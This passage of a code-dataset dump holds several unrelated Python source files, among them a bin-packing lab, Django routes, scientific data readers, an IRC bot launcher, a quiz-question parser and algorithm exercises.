\n lastContainer = containers.getLastContainer() \n iter += 1 \n if lastContainer.FreeSpace() >= cargo.size: \n lastContainer.addCargo(cargo) \n else: \n tempDict = containers.getMostFullAndSuitable(cargo) \n if tempDict: \n mostFullSuitable = tempDict['container'] \n iter += tempDict['iter'] + 1 \n if mostFullSuitable.FreeSpace() >= cargo.size: \n mostFullSuitable.addCargo(cargo) \n else: \n containers.addNewAndPut(cargo) \n else: \n iter += len(containers.suit) \n containers.addNewAndPut(cargo) \n self.printContainersInfo(containers.suit, label) \n print('Number of iterations:', iter) \n\n def CargoListFromSizes(self, sizes, sort = False, reverse = False):\n if sort: \n sizes = sorted(sizes, reverse=reverse) \n cargos = []\n for size in sizes: \n newCargo = ContainerSize(size) \n cargos.append(newCargo) \n return cargos \n\n @staticmethod \n def printContainersInfo(suit, label = ''): \n toPrint ='--------------------------' + '\\n' + label + '\\n' + '--------------------------' + '\\n' \n for container in suit: \n string = 'Container size = ' + str(container.getCargoWeight()) + '( ' \n for cargo in container.cargos: \n string += str(cargo.size) + ' + ' \n toPrint += string[0:-2] + ')\\n' \n toPrint += 'Containers required: ' + str(len(suit)) \n print(toPrint) ","sub_path":"Lab_2/impl.py","file_name":"impl.py","file_ext":"py","file_size_in_byte":5661,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"396534542","text":"# -*- coding: utf-8 -*-\n# @Time : 2018/9/4\n# @Author : hay\nfrom django.conf.urls import url\nfrom sendblaster.views import platform, campaign, mailings, campaignclassify\napp_name = 'sendblaster'\n\nurlpatterns = [\n url(r'^platform$', platform.PlatformViews.as_view(), name='platform'),\n url(r'^campaign$', campaign.CampaignViews.as_view(), name='campaign'),\n url(r'^mailing$', mailings.CampaignViews.as_view(), name='mailing'),\n url(r'^mailing-upload$', mailings.CampaignUploadViews.as_view(), name='mailing-upload'),\n url(r'^mailing-statssummary$', mailings.MailingStatsSummary.as_view(), name='mailing-statssummary'),\n url(r'^campaignclassify$', campaignclassify.CampaignClassifyViews.as_view(), name='campaignclassify'),\n]","sub_path":"sendblaster/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":744,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"110283341","text":"import numpy as np\n\nclass PadeOpsPlanes:\n def __init__(self, basedir, RunID, nx, ny, nz, Lx, Ly, Lz, xst, xen, yst, yen, zst, zen):\n self.basedir = basedir\n self.xst = xst\n self.yst = yst\n self.xen = xen\n self.yen = yen\n self.zst = zst\n self.zen = zen\n self.Lx = Lx\n self.Ly = Ly\n self.Lz = Lz\n self.nx = nx\n self.ny = ny\n self.nz = nz\n self.dx = Lx/nx\n self.dy = Ly/ny\n self.dz = Lz/ny\n \n self.RunID = RunID\n self.x = np.arange(0.,self.Lx,self.dx)\n self.y = np.arange(0.,self.Ly,self.dy)\n self.z = np.arange(0.,self.Lz,self.dz)\n\n def read_xy_plane(self, tidx, zid, plane_label): \n fname = self.basedir + '/Run' + '{:02d}'.format(self.RunID) + '_t' + '{:06d}'.format(tidx) + '_z'+ '{:05d}'.format(zid) + plane_label\n tmp = np.fromfile(fname,dtype=np.dtype(np.float64),count=-1).reshape((self.nx,self.ny),order='F')\n field = tmp[self.xst:self.xen,self.yst:self.yen] \n return field\n\n def read_xz_plane(self, tidx, yid, plane_label): \n fname = self.basedir + '/Run' + '{:02d}'.format(self.RunID) + '_t' + '{:06d}'.format(tidx) + '_y'+ '{:05d}'.format(yid) + plane_label\n tmp = np.fromfile(fname,dtype=np.dtype(np.float64),count=-1).reshape((self.nx,self.nz),order='F')\n field = tmp[self.xst:self.xen,self.zst:self.zen] \n return field\n \n def read_yz_plane(self, tidx, xid, plane_label): \n fname = self.basedir + '/Run' + '{:02d}'.format(self.RunID) + '_t' + '{:06d}'.format(tidx) + '_x'+ '{:05d}'.format(xid) + plane_label\n tmp = np.fromfile(fname,dtype=np.dtype(np.float64),count=-1).reshape((self.ny,self.nz),order='F')\n field = tmp[self.yst:self.yen,self.zst:self.zen] \n return field\n","sub_path":"src/PadeOpsPlanes.py","file_name":"PadeOpsPlanes.py","file_ext":"py","file_size_in_byte":1825,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"111386537","text":"import os\nimport argparse\n\n\ndef get_all_files(dir):\n path_f = []\n for dirs, subdirs, files in os.walk(dir):\n for f in files:\n path = os.path.join(dirs, f)\n path_f.append(path)\n return sorted(path_f, key=lambda file: os.path.basename(file))\n\n\ndef are_files_duplicates(file1, file2):\n return os.path.basename(file1) == os.path.basename(file2) and os.path.getsize(file1) == os.path.getsize(file2)\n\n\ndef is_dir_exist(dir):\n return os.path.exists(dir)\n\n\ndef find_duplicates(dir):\n duplicates = []\n path_f = get_all_files(dir)\n for current_file, next_file in zip(path_f, path_f[1:]):\n if are_files_duplicates(current_file, next_file):\n duplicates.append((current_file, next_file))\n return duplicates\n\n\ndef arg_parser():\n parser = argparse.ArgumentParser()\n parser.add_argument(\"dirpath\", type=str, help=\"Path to cheking dir\")\n return parser.parse_args()\n\n\nif __name__ == '__main__':\n if is_dir_exist(arg_parser().dirpath):\n duplicates = find_duplicates(arg_parser().dirpath)\n if duplicates:\n print(\"\\n\".join(\"{} дублируется с {}\".format(duplicate[0], duplicate[1]) for duplicate in duplicates))\n else:\n print(\"Дубликатов нет\")\n else:\n print(\"Такой директории не существует\")\n","sub_path":"duplicates.py","file_name":"duplicates.py","file_ext":"py","file_size_in_byte":1368,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"555241459","text":"\nfrom Peeves.TestUtils import *\nfrom unittest import TestCase\nfrom McUtils.CPotentialLib import *\nimport numpy as np\n\nclass RynDMCTests(TestCase):\n\n @validationTest\n def load_cap(self):\n import sys\n sys.path.insert(0, TestManager.test_data_dir)\n import constantPot as cp\n return cp.potential\n\n @validationTest\n def test_loadPot(self):\n self.assertEquals(type(self.load_cap()).__name__, \"PyCapsule\")\n\n @validationTest\n def test_CPot(self):\n walker = np.array([\n [0.9578400,0.0000000,0.0000000],\n [-0.2399535,0.9272970,0.0000000],\n [0.0000000,0.0000000,0.0000000]\n ])\n self.assertEquals(\n CPotential(self.load_cap())([\"H\", \"H\", \"O\"], walker),\n 52.0\n )","sub_path":"Tests/RynDMCTests.py","file_name":"RynDMCTests.py","file_ext":"py","file_size_in_byte":785,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"18755121","text":"def insertion_sort(x) :\n for i in range(1, len(x)) :\n key = x[i]\n j = i-1\n while j>=0 and x[j] > key:\n x[j+1] = x[j]\n j -= 1\n x[j+1] = key\n\ny = []\nlen = int(input())\nfor _ in range(len) : y.append(int(input()))\ninsertion_sort(y)\nfor i in y : print(i)\n","sub_path":"insertionsort_typeerror.py","file_name":"insertionsort_typeerror.py","file_ext":"py","file_size_in_byte":304,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"552785774","text":"# uncompyle6 version 3.7.4\n# Python bytecode 3.7 (3394)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build\\bdist.win32\\egg\\SimpleMathCalc\\square.py\n# Compiled at: 2019-04-02 12:15:16\n# Size of source mod 2**32: 587 bytes\n\n\ndef function():\n number1 = eval(input('Enter the number of squares opened: '))\n number2 = eval(input('Enter the number of squares: '))\n n = 1\n if number1 == 0:\n if number2 == 0:\n sum = 'input error'\n return sum\n elif number2 % 2 == 0 and m == n / number2:\n if number1 < 0:\n sum = 'input error'\n return sum\n sum = pow(number1, m)\n return sum\n else:\n m = n / number2\n sum = pow(number1, m)\n return sum\n\n\nwhile True:\n print(function())","sub_path":"pycfiles/SimpleMathCalc-0.1-py3.7/square.cpython-37.py","file_name":"square.cpython-37.py","file_ext":"py","file_size_in_byte":826,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"603407150","text":"from xml.dom import minidom\nimport re\nimport simplejson\nimport pymongo\nfrom pymongo import MongoClient\n\nclient = MongoClient('mongodb://user:pass@ds153958.mlab.com:53958/qb-questions')\n\nxmldoc = minidom.parse('output.xml') #get the correct xml file\nboxes = xmldoc.getElementsByTagName('textbox') #find every single textbox. Many of these contain a question each.\nanswerlist = [] #list of list of answers. index i corresponds to a list of answers for question i.\nquestionlist = []\nfor b in boxes:\n\tanswerState = False\n\tanswers = [] #init list for this question's answers\n\tif (b.firstChild and b.getElementsByTagName('text')[0].firstChild.nodeValue == \"(\"): #if this is a question. Note that the character of choice is the (\n\t\tquestion = b.getElementsByTagName('text') #get all text elements in this question. question is a list of textelements, each of which contain a letter.\n\t\tanswer = []\n\t\tqtext = []\n\t\tfor i in range(len(question)):\n\t\t\tletter = question[i].firstChild.nodeValue #get the letter\n\t\t\tif (letter == \"\\n\"):\n\t\t\t\tqtext.append(\" \")\n\t\t\telse:\n\t\t\t\tqtext.append(letter)\n\t\t\tif 'size' in list(question[i].attributes.keys()):\n\t\t\t\tsize = question[i].attributes['size'].value #get the size of this\n\t\t\tif (\"\".join([s.firstChild.nodeValue for s in question[i-6:i]]) == \"ANSWER\"): #check if we're at the answer part of this question\n\t\t\t\tanswerState = True\n\t\t\tif (answerState and float(size) > 14): #if bolded and we're at the answer (remember, there are powers)\n\t\t\t\tanswer.append(letter)\n\t\t\tif (not ('size' in list(question[i].attributes.keys())) and answerState and i < len(question)-1): #if it's a space, we're in the answer section, and not at the end\n\t\t\t\tif ('size' in list(question[i+1].attributes.keys()) and float(question[i+1].attributes['size'].value) < 14 and len(answer) > 0): #check if the next char is bolded\n\t\t\t\t\tif (answer[-1] == \" \" or answer[-2:] == \"\\n\"):\n\t\t\t\t\t\tanswer.pop()\n\t\t\t\t\tanswers.append(\"\".join(answer)) #if it isn't bolded, we know we're at the end of one answer (continue to the next possible answer, so reset.)\n\t\t\t\t\tanswer = []\n\t\t\t\t\n\t\tif (len(answer) > 0):\n\t\t\tif (answer[-1] == \" \" or answer[-1] == \"\\n\"):\n\t\t\t\tanswer.pop()\n\t\t\tanswers.append(\"\".join(answer)) #catch the last answer\n\t\tanswerlist.append(answers)\n\t\tquestionlist.append(\"\".join(qtext).split(\"ANSWER\")[0]) #get the question part of the text\n\nfinal = \"{\\\"packet\\\": [\\n\"\n\nfor i in range(len(questionlist)):\n\tquestion = questionlist[i].replace(\"\\\"\", \"\\\\\" + \"\\\"\") #format question\n\tanswer = []\n\tfor a in answerlist[i]:\n\t\tanswer.append(\"\\\"\" + re.sub(r'\\([^)]*\\)', '', a.replace(\"\\\"\", \"\\\\\" + \"\\\"\")) + \"\\\"\") #format answer\n\tif answer != []:\n\t\tfinal += \"{\\\"question\\\": \" + \"\\\"\" + question + \"\\\", \\\"answer\\\": \" + \"[\" + \", \".join(answer) + \"]\" + \"},\" + \"\\n\" #format into json\n\n# Get the sampleDB database\ndb = client.get_default_database()\nqs = db.questions\n\nfinal = final[:-2]\n\nfinal += \"\\n\"\n\nfinal += \"]}\"\n\nprint(final)\n\n#j = json.loads(final)\n\n#\nj = simplejson.loads(final)\n\nprint(j)\nprint(\"------------------------------------------------------\")\nqs.insert(j)\n\n\n\n\n\n\n","sub_path":"parse/parse_old.py","file_name":"parse_old.py","file_ext":"py","file_size_in_byte":3051,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"6836916","text":"# -*-T coding: utf-8 -*-\n\"\"\"\nCreated on Fri Aug 2 02:08:58 2019\n\n@author: iceblaze\n\"\"\"\n\n#load the csv file using read_csv function of pandas library\nfrom sklearn.model_selection import LeaveOneOut\nfrom sklearn.model_selection import cross_val_score\nfrom sklearn.linear_model import LogisticRegression\nimport pandas as pd\nfrom sklearn.preprocessing import LabelEncoder\nfrom sklearn.preprocessing import OneHotEncoder\n\n#load a csv file using pandas\ndata = pd.read_csv( \"Train_v2.csv\")\n\n#assinging dependent variable \nY = data.iloc[:,3].values\n# assinging independent varible\nX = data.drop(columns=['bank_account','uniqueid', 'household_size','age_of_respondent' ]).astype(str)\n#seperating the non-categorical features\nz = data.iloc[:,[6,7]]\nlabelencoder_x = LabelEncoder()\nX = X.apply(lambda col: labelencoder_x.fit_transform(col))\nonehotencoder = OneHotEncoder()\nX = onehotencoder.fit_transform(X).toarray()\n\nlabelencoder_y = LabelEncoder()\nY = labelencoder_y.fit_transform(Y)\n\n\n#avoiding the dummy variable trap\nX = X[:,1:]\nX = pd.DataFrame(data=X)\nX = X.join(z).values\n\n\n\nnum_folds = 10\nseed = 7\n\nloocv = LeaveOneOut ()\nmodel = LogisticRegression(solver='liblinear')\n\nresults = cross_val_score(model, X, Y, cv=loocv)\nprint(\"Accuracy: %.3f%% (%.3f%%) \" % (results.mean()*100.0, results.std()*100.0))","sub_path":"evaluation__leave_one_out_cross validation.py","file_name":"evaluation__leave_one_out_cross validation.py","file_ext":"py","file_size_in_byte":1301,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"524127318","text":"# 460. Find K Closest Elements\n# Description\n# Given a target number, a non-negative integer k and an integer array A sorted in ascending order, find the k closest numbers to target in A, sorted in ascending order by the difference between the number and target. Otherwise, sorted in ascending order by number if the difference is same.\n#\n# The value k is a non-negative integer and will always be smaller than the length of the sorted array.\n# Length of the given array is positive and will not exceed 10^4\n# Absolute value of elements in the array and x will not exceed 10^4\n# Have you met this question in a real interview?\n# Example\n# Given A = [1, 2, 3], target = 2 and k = 3, return [2, 1, 3].\n#\n# Given A = [1, 4, 6, 8], target = 3 and k = 3, return [4, 1, 6].\n#\n# Challenge\n# O(logn + k) time complexity.\n\n\nclass Solution:\n\t\"\"\"\n\t@param A: an integer array\n\t@param target: An integer\n\t@param k: An integer\n\t@return: an integer array\n\t\"\"\"\n\t\n\tdef kClosestNumbers (self, A, target, k):\n\t\t# write your code here\n\t\t# k cloest, since it is ordered, we can first find closest use binary search (O(log(n))), then check left side and right side, use two pointers. So binary search + two pointers O(log(n)+k)\n\t\t\n\t\tif A is None or len (A) == 0 or k is None or target is None or k <= 0:\n\t\t\treturn []\n\t\t\n\t\tif len (A) <= k:\n\t\t\t# we can not directly return A, we need to update k = len(A), only need to find len(A) cloest, also need to return result in the order that closest to target, not original order\n\t\t\tk = len (A)\n\t\t\n\t\tstart = 0\n\t\tend = len (A) - 1\n\t\tmid = start + (end - start) // 2\n\t\twhile start + 1 < end:\n\t\t\tmid = start + (end - start) // 2\n\t\t\tif A [mid] > target:\n\t\t\t\tend = mid\n\t\t\telif A [mid] < target:\n\t\t\t\tstart = mid\n\t\t\telse:\n\t\t\t\tbreak\n\t\t\t\n\t\t\t# either A[mid] == target, or start == end or start == end - 1\n\t\t\n\t\tif A [mid] == target:\n\t\t\tclosest = mid\n\t\telif start == end - 1:\n\t\t\t# closest in start and end\n\t\t\tif abs (target - A [start]) <= abs (target - A [end]):\n\t\t\t\tclosest = start\n\t\t\telse:\n\t\t\t\tclosest = end\n\t\t\n\t\tp1 = closest - 1\n\t\tp2 = closest + 1\n\t\t# two pointers\n\t\t\n\t\tif k == 1:\n\t\t\treturn A [closest]\n\t\t\n\t\tcount = 1\n\t\tresult = [A [closest]]\n\t\t# we need to find total k\n\t\twhile count < k:\n\t\t\t# find candidate\n\t\t\tif p1 >= 0 and p2 < len (A):\n\t\t\t\t# we have two candidate\n\t\t\t\tif target - A [p1] <= A [p2] - target:\n\t\t\t\t\tresult.append (A [p1])\n\t\t\t\t\tp1 -= 1\n\t\t\t\telse:\n\t\t\t\t\tresult.append (A [p2])\n\t\t\t\t\tp2 += 1\n\t\t\telif p1 < 0:\n\t\t\t\tresult.append (A [p2])\n\t\t\t\tp2 += 1\n\t\t\telse:\n\t\t\t\tresult.append (A [p1])\n\t\t\t\tp1 -= 1\n\t\t\t\n\t\t\tcount += 1\n\t\t\n\t\treturn result\n\n\nassert Solution().kClosestNumbers([1,2,3],2,3) == [2,1,3]\n\nassert Solution().kClosestNumbers([1,4,6,8],3,3) == [4,1,6]","sub_path":"Algorithm/Python/Array/FindKCloestElements.py","file_name":"FindKCloestElements.py","file_ext":"py","file_size_in_byte":2676,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"181598759","text":"#!/usr/bin/env python2.7\n# coding=utf-8\n\"\"\"\nSopel - An IRC Bot\nCopyright 2008, Sean B. Palmer, inamidst.com\nCopyright © 2012-2014, Elad Alfassa \nLicensed under the Eiffel Forum License 2.\n\nhttp://sopel.chat\n\"\"\"\nfrom __future__ import unicode_literals, absolute_import, print_function, division\n\nimport sys\nfrom sopel.tools import stderr\n\nif sys.version_info < (2, 7):\n stderr('Error: Requires Python 2.7 or later. Try python2.7 sopel')\n sys.exit(1)\nif sys.version_info.major == 3 and sys.version_info.minor < 3:\n stderr('Error: When running on Python 3, Python 3.3 is required.')\n sys.exit(1)\n\nimport os\nimport argparse\nimport signal\n\nfrom sopel.__init__ import run, __version__\nfrom sopel.config import Config, _create_config, ConfigurationError, _wizard\nimport sopel.tools as tools\n\nhomedir = os.path.join(os.path.expanduser('~'), '.sopel')\n\n\ndef enumerate_configs(extension='.cfg'):\n configfiles = []\n if os.path.isdir(homedir):\n sopel_dotdirfiles = os.listdir(homedir) # Preferred\n for item in sopel_dotdirfiles:\n if item.endswith(extension):\n configfiles.append(item)\n\n return configfiles\n\n\ndef find_config(name, extension='.cfg'):\n if os.path.isfile(name):\n return name\n configs = enumerate_configs(extension)\n if name in configs or name + extension in configs:\n if name + extension in configs:\n name = name + extension\n\n return os.path.join(homedir, name)\n\n\ndef main(argv=None):\n global homedir\n # Step One: Parse The Command Line\n try:\n parser = argparse.ArgumentParser(description='Sopel IRC Bot',\n usage='%(prog)s [options]')\n parser.add_argument('-c', '--config', metavar='filename',\n help='use a specific configuration file')\n parser.add_argument(\"-d\", '--fork', action=\"store_true\",\n dest=\"daemonize\", help=\"Daemonize sopel\")\n parser.add_argument(\"-q\", '--quit', action=\"store_true\", dest=\"quit\",\n help=\"Gracefully quit Sopel\")\n parser.add_argument(\"-k\", '--kill', action=\"store_true\", dest=\"kill\",\n help=\"Kill Sopel\")\n parser.add_argument(\"-l\", '--list', action=\"store_true\",\n dest=\"list_configs\",\n help=\"List all config files found\")\n parser.add_argument(\"-m\", '--migrate', action=\"store_true\",\n dest=\"migrate_configs\",\n help=\"Migrate config files to the new format\")\n parser.add_argument('--quiet', action=\"store_true\", dest=\"quiet\",\n help=\"Supress all output\")\n parser.add_argument('-w', '--configure-all', action='store_true',\n dest='wizard', help='Run the configuration wizard.')\n parser.add_argument('--configure-modules', action='store_true',\n dest='mod_wizard', help=(\n 'Run the configuration wizard, but only for the '\n 'module configuration options.'))\n parser.add_argument('-v', '--version', action=\"store_true\",\n dest=\"version\", help=\"Show version number and exit\")\n if argv:\n opts = parser.parse_args(argv)\n else:\n opts = parser.parse_args()\n\n # Step Two: \"Do not run as root\" checks.\n try:\n # Linux/Mac\n if os.getuid() == 0 or os.geteuid() == 0:\n stderr('Error: Do not run Sopel with root privileges.')\n sys.exit(1)\n except AttributeError:\n # Windows\n if os.environ.get(\"USERNAME\") == \"Administrator\":\n stderr('Error: Do not run Sopel as Administrator.')\n sys.exit(1)\n\n if opts.version:\n py_ver = '%s.%s.%s' % (sys.version_info.major,\n sys.version_info.minor,\n sys.version_info.micro)\n print('Sopel %s (running on python %s)' % (__version__, py_ver))\n print('http://sopel.chat/')\n return\n elif opts.wizard:\n _wizard('all', opts.config)\n return\n elif opts.mod_wizard:\n _wizard('mod', opts.config)\n return\n\n if opts.list_configs:\n configs = enumerate_configs()\n print('Config files in ~/.sopel:')\n if len(configs) is 0:\n print('\\tNone found')\n else:\n for config in configs:\n print('\\t%s' % config)\n print('-------------------------')\n return\n\n config_name = opts.config or 'default'\n\n configpath = find_config(config_name)\n if not os.path.isfile(configpath):\n print(\"Welcome to Sopel!\\nI can't seem to find the configuration file, so let's generate it!\\n\")\n if not configpath.endswith('.cfg'):\n configpath = configpath + '.cfg'\n _create_config(configpath)\n configpath = find_config(config_name)\n try:\n config_module = Config(configpath)\n except ConfigurationError as e:\n stderr(e)\n sys.exit(2)\n\n if config_module.core.not_configured:\n stderr('Bot is not configured, can\\'t start')\n # exit with code 2 to prevent auto restart on fail by systemd\n sys.exit(2)\n\n logfile = os.path.os.path.join(config_module.core.logdir, 'stdio.log')\n\n config_module._is_daemonized = opts.daemonize\n\n sys.stderr = tools.OutputRedirect(logfile, True, opts.quiet)\n sys.stdout = tools.OutputRedirect(logfile, False, opts.quiet)\n\n # Handle --quit, --kill and saving the PID to file\n pid_dir = config_module.core.pid_dir\n if opts.config is None:\n pid_file_path = os.path.join(pid_dir, 'sopel.pid')\n else:\n basename = os.path.basename(opts.config)\n if basename.endswith('.cfg'):\n basename = basename[:-4]\n pid_file_path = os.path.join(pid_dir, 'sopel-%s.pid' % basename)\n if os.path.isfile(pid_file_path):\n with open(pid_file_path, 'r') as pid_file:\n try:\n old_pid = int(pid_file.read())\n except ValueError:\n old_pid = None\n if old_pid is not None and tools.check_pid(old_pid):\n if not opts.quit and not opts.kill:\n stderr('There\\'s already a Sopel instance running with this config file')\n stderr('Try using the --quit or the --kill options')\n sys.exit(1)\n elif opts.kill:\n stderr('Killing the sopel')\n os.kill(old_pid, signal.SIGKILL)\n sys.exit(0)\n elif opts.quit:\n stderr('Signaling Sopel to stop gracefully')\n if hasattr(signal, 'SIGUSR1'):\n os.kill(old_pid, signal.SIGUSR1)\n else:\n os.kill(old_pid, signal.SIGTERM)\n sys.exit(0)\n elif opts.kill or opts.quit:\n stderr('Sopel is not running!')\n sys.exit(1)\n elif opts.quit or opts.kill:\n stderr('Sopel is not running!')\n sys.exit(1)\n if opts.daemonize:\n child_pid = os.fork()\n if child_pid is not 0:\n sys.exit()\n with open(pid_file_path, 'w') as pid_file:\n pid_file.write(str(os.getpid()))\n\n # Step Five: Initialise And Run sopel\n run(config_module, pid_file_path)\n except KeyboardInterrupt:\n print(\"\\n\\nInterrupted\")\n os._exit(1)\nif __name__ == '__main__':\n main()\n","sub_path":"sopel/run_script.py","file_name":"run_script.py","file_ext":"py","file_size_in_byte":7939,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"146467721","text":"from .libcudawrapper import RLContext, rl_decon\nfrom .otf import TemporaryOTF\nimport os\nimport tifffile as tf\nfrom fnmatch import fnmatch\nimport numpy as np\n\n\ndef _yield_arrays(images, fpattern='*.tif'):\n \"\"\"Accepts a numpy array, a filepath, a directory, or a list of these\n and returns a generator that yields numpy arrays.\n\n fpattern argument is used to filter files in a directory\n \"\"\"\n if isinstance(images, np.ndarray):\n yield images\n\n elif isinstance(images, str):\n if os.path.isfile(images):\n yield tf.imread(images)\n\n elif os.path.isdir(images):\n imfiles = [f for f in os.listdir(images) if fnmatch(f, fpattern)]\n if not len(imfiles):\n raise IOError('No files matching pattern \"{}\" found in directory: {}'\n .format(fpattern, images))\n for fpath in imfiles:\n yield tf.imread(os.path.join(images, fpath))\n\n elif isinstance(images, (list, tuple)):\n for item in images:\n yield from _yield_arrays(item) # noqa\n\n\ndef decon(images, psf, fpattern='*.tif', **kwargs):\n \"\"\"Deconvolve an image or images with a PSF or OTF file\n\n If `images` is a directory, use the `fpattern` argument to select files\n by filename pattern.\n\n Args:\n images (str, np.ndarray, list, tuple): The array, filepath,\n directory, or list/tuple thereof to deconvolve\n psf (str, np.ndarray): a filepath of a PSF or OTF file, or a 3D numpy\n PSF array. Function will auto-detect whether the file is a 3D PSF\n or a filepath representing a 2D complex OTF.\n fpattern (str, optional): Defaults to '\\*.tif'. Filepattern to use when\n a directory is provided in the ``images`` argument\n ** kwargs: optional keyword arguments listed below\n ** dxdata (float): The xy pixel size of the ``image``. Defaults to 0.1\n ** dzdata (float): The z step size of the ``image``. Defaults to 0.5\n ** dxpsf (float): The xy pixel size of the ``psf``. Defaults to 0.1\n ** dzpsf (float): The z step size of the ``psf``. Defaults to 0.1\n ** background (int): Background to subtract. use 'auto' to subtract\n median val of last Z plane. Defaults to 80\n ** deskew (float): Angle to deskew data (for stage scanning acquisition).\n Defaults to 0\n ** pad_val (int): Value to pad edges with when deskewing. Should be\n zero when ``background`` is 'auto' Defaults to 0\n ** rotate (float): Degrees to rotate volume in Y axis (to make Z axis orthogonal to coverslip). Defaults to 0\n ** width (int): Width of output image (0 = full). Defaults to 0\n ** n_iters (int): Number of iterations in deconvolution Defaults to 10\n ** save_deskewed (bool): Save raw deskewed files (if deskew > 0). Defaults to False\n ** napodize (int): Number of pixels to soften edge with. Defaults to 15\n ** nz_blend (int): Number of top and bottom sections to blend in to reduce axial ringing. Defaults to 0\n ** dup_rev_z (bool): Duplicate reversed stack prior to decon to reduce axial ringing. Defaults to False\n ** wavelength (int): Wavelength in nanometers (for OTF cleanup). Defaults to 520\n ** fixorigin (int): For all kz, extrapolate using pixels kr=1 to this pixel to get value for kr=0. Defaults to 10\n ** otf_bgrd (None, int): Background to subtract in PSF (None = autodetect). Defaults to None\n ** na (float): Numerical aperture (for OTF cleanup). Defaults to 1.25]\n ** nimm (float): Refractive index of medium (for OTF cleanup). Defaults to 1.3\n ** krmax (int): Pixels outside this limit will be zeroed (overwriting estimated value from ``na`` and ``nimm``). Defaults to 0\n ** cleanup_otf (bool): Clean up OTF outside of OTF support. Defaults to False\n\n Raises:\n ValueError: If save_deskewed is True and deskew is unset or 0\n IOError: If a directory is provided as input and ``fpattern`` yields no files\n NotImplementedError: If ``psf`` is provided as a complex, 2D numpy array\n (OTFs can only be provided as filenames created with :func:`pycudadecon.make_otf`)\n\n Returns:\n np.ndarray, list: numpy array or list of arrays (deconvolved images)\n\n If the input ``images`` is a single array, or filepath, then the returned\n value will be a single 3D image volume.\n\n If the input is a directory or a list of arrays, then the returned value\n will be a list of 3D image volumes.\n\n if ``save_deskewed == True``, returns a tuple (decon, deskewed) or a list\n of tuples (if input was iterable)\n\n Examples:\n\n deconvolve a 3D TIF volume with a 3D PSF volume (e.g. a single bead stack)\n\n >>> impath = '/path/to/image.tif'\n >>> psfpath = '/path/to/psf.tif'\n >>> result = decon(impath, psfpath)\n\n deconvolve all TIF files in a specific directory that match a certain\n `filename pattern `_,\n (in this example, all TIFs with the string '560nm' in their name)\n\n >>> imdirectory = '/directory/with/images'\n >>> psfpath = '/path/to/psf.tif'\n >>> result = decon(imdirectory, psfpath, fpattern='*560nm*.tif')\n\n deconvolve a list of images, provided either as np.ndarrays, filepaths,\n or directories\n\n >>> imdirectory = '/directory/with/images'\n >>> impath = '/path/to/image.tif'\n >>> imarray = tifffile.imread('some_other_image.tif')\n >>> psfpath = '/path/to/psf.tif'\n >>> result = decon([imdirectory, impath, imarray],\n ... psfpath, fpattern='*560nm*.tif')\n\n\n\n \"\"\"\n if kwargs.get('save_deskewed'):\n if kwargs.get('deskew', 1) == 0:\n raise ValueError('Cannot use save_deskewed=True with deskew=0')\n if kwargs.get('deskew', 0) == 0:\n raise ValueError('Must set deskew != 0 when using save_deskewed=True')\n\n out = []\n with TemporaryOTF(psf, **kwargs) as otf:\n arraygen = _yield_arrays(images)\n # first, assume that all of the images are the same shape...\n # in which case we can prevent a lot of GPU IO\n # grab and store the shape of the first item in the generator\n next_im = next(arraygen)\n shp = next_im.shape\n\n with RLContext(shp, otf.path, **kwargs) as ctx:\n while True:\n out.append(rl_decon(next_im, output_shape=ctx.out_shape, **kwargs))\n try:\n next_im = next(arraygen)\n # here we check to make sure that the images are still the same\n # shape... if not, we'll continue below\n if not next_im.shape == shp:\n break\n except StopIteration:\n next_im = None\n break\n\n # if we had a shape mismatch, there will still be images left to process\n # process them the slow way here...\n if next_im is not None:\n for imarray in [next_im, *arraygen]:\n with RLContext(imarray.shape, otf.path, **kwargs) as ctx:\n out.append(rl_decon(imarray, output_shape=ctx.out_shape, **kwargs))\n\n if isinstance(images, (list, tuple)) and len(images) > 1:\n return out\n else:\n return out[0]\n","sub_path":"pycudadecon/deconvolution.py","file_name":"deconvolution.py","file_ext":"py","file_size_in_byte":7440,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"43551730","text":"\n\n#calss header\nclass _LEAD():\n\tdef __init__(self,): \n\t\tself.name = \"LEAD\"\n\t\tself.definitions = [u'used to describe the main performer or part in a performance: ']\n\n\t\tself.parents = []\n\t\tself.childen = []\n\t\tself.properties = []\n\t\tself.jsondata = {}\n\n\n\t\tself.specie = 'adjectives'\n\n\n\tdef run(self, obj1, obj2):\n\t\tself.jsondata[obj2] = {}\n\t\tself.jsondata[obj2]['properties'] = self.name.lower()\n\t\treturn self.jsondata\n","sub_path":"xai/brain/wordbase/adjectives/_lead.py","file_name":"_lead.py","file_ext":"py","file_size_in_byte":416,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"524233160","text":"import numpy as np\nimport cvxpy as cp\n\nETA = 0.9\nN_IAAS = 20\nN_SERVICE = 10\nR = (np.random.randint(low=7, high=10, size=N_SERVICE)*100)\nF = np.random.uniform(low=0.5, high=1.5, size=N_SERVICE)\nCHOICE = np.random.randint(low=0, high=2, size=(N_IAAS, N_SERVICE), dtype=bool)\nI = []\nC = [4000] * N_IAAS\nU = np.random.uniform(low=0.3, high=0.4, size=N_IAAS)\ntau = np.random.uniform(low=0.01, high=1, size=(N_IAAS, N_SERVICE))\nIS = np.zeros((N_IAAS, N_SERVICE), dtype=bool)\n\nfor s in 